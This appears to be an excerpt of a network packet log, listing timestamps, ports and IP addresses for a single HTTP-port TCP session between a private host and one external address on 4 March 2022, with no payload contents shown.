Mar 4, 2022 15:23:45.465089083 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465101004 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465112925 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465140104 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465163946 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465181112 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465195894 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465219975 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465226889 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465260029 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465279102 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465300083 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465321064 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465339899 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465348005 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465380907 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465398073 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465409994 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465420008 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465426922 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465461969 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465475082 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465502024 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465521097 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465540886 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465559006 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465583086 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465593100 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465622902 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465641022 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465662956 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465662956 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465672016 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465706110 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465715885 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465745926 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465763092 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465785027 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465805054 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465826988 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465847969 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465864897 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465884924 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465904951 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465914011 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465940952 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465945005 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465950966 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465985060 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466001034 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466027021 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466043949 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466065884 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466085911 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466104984 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466113091 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466171026 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466201067 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466234922 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466279030 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466296911 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466315985 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466324091 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466353893 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466367960 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466393948 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466399908 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466428041 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466430902 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466435909 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466470003 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466481924 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466506958 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466522932 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466556072 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466567993 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466609001 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466630936 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466645002 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466655970 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466666937 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466682911 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466694117 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466722012 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466736078 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466758013 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466772079 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466795921 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466813087 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466833115 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466840982 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466871023 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466886044 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466897964 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466909885 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466921091 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466947079 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466964006 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.466985941 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.466998100 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467024088 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467040062 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467060089 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467070103 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467097998 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467108965 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467135906 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467149019 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467168093 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467174053 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467178106 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467212915 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467223883 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467250109 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467262983 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467288017 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467299938 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467325926 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467343092 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467363119 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467375040 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467394114 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467401028 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467408895 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467437029 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467451096 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467474937 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467482090 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467514038 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467529058 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467552900 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467562914 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467592955 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467606068 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467632055 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467644930 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467653990 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467669010 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467690945 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467706919 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467714071 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467744112 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467757940 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467782974 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467792034 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467822075 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467833042 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467859030 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467873096 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467885017 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467896938 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467905045 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467933893 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467945099 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.467971087 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.467983007 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.468008995 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.468024015 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.468048096 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.468055964 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.468086004 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.468096972 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.468138933 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.468147039 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.468383074 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.567982912 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568044901 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568089008 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568123102 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568157911 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568197966 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568207026 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568213940 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568238974 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568257093 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568279982 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568288088 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568317890 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568326950 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568356991 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568360090 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568397045 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568401098 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568434954 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568439960 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568474054 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568476915 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568512917 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568516970 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568555117 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568556070 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568594933 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568599939 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568631887 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568641901 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568672895 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568696022 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568711042 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568732023 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568748951 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568785906 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568788052 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568798065 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568826914 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568841934 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568869114 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568883896 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568909883 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568945885 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.568952084 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568968058 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568974018 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.568984985 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569010973 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569024086 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569061041 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569061995 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569067955 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569098949 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569137096 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569138050 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569144011 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569176912 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569183111 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569216967 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569242954 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569253922 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569267988 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569282055 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569293976 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569294930 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569331884 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569338083 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569369078 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569394112 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569406986 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569406986 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569444895 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569473982 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569483995 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569495916 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569499969 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569524050 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569535017 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569564104 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569593906 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569602966 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569617987 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569642067 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569644928 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569679022 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569689989 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569716930 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569734097 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569755077 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569780111 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569783926 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569794893 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569827080 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569833040 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569839954 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569869995 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569901943 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569909096 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569911957 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569947958 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.569966078 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.569984913 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570014954 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570019007 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570024014 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570024967 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570063114 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570066929 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570101976 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570136070 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570142031 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570146084 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570199966 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570211887 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570250034 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570271969 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570288897 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570295095 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570327044 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570348024 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570363045 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570383072 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570401907 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570409060 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570440054 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570451975 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570478916 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570518017 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570518970 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570544958 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570558071 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570580959 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570600033 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570604086 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570606947 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570638895 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570641994 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570678949 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570696115 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570733070 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570738077 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570784092 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570827007 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570832968 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570863962 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570885897 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570902109 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570909977 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570940971 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570957899 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.570982933 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.570991039 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571018934 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571021080 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571023941 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571060896 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571073055 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571096897 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571108103 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571135044 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571141005 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571172953 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571181059 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571211100 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571250916 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571270943 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571275949 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571278095 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571305037 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571310997 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571343899 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571351051 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571382999 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571388960 CET	49166	80	192.168.2.22	194.5.188.24
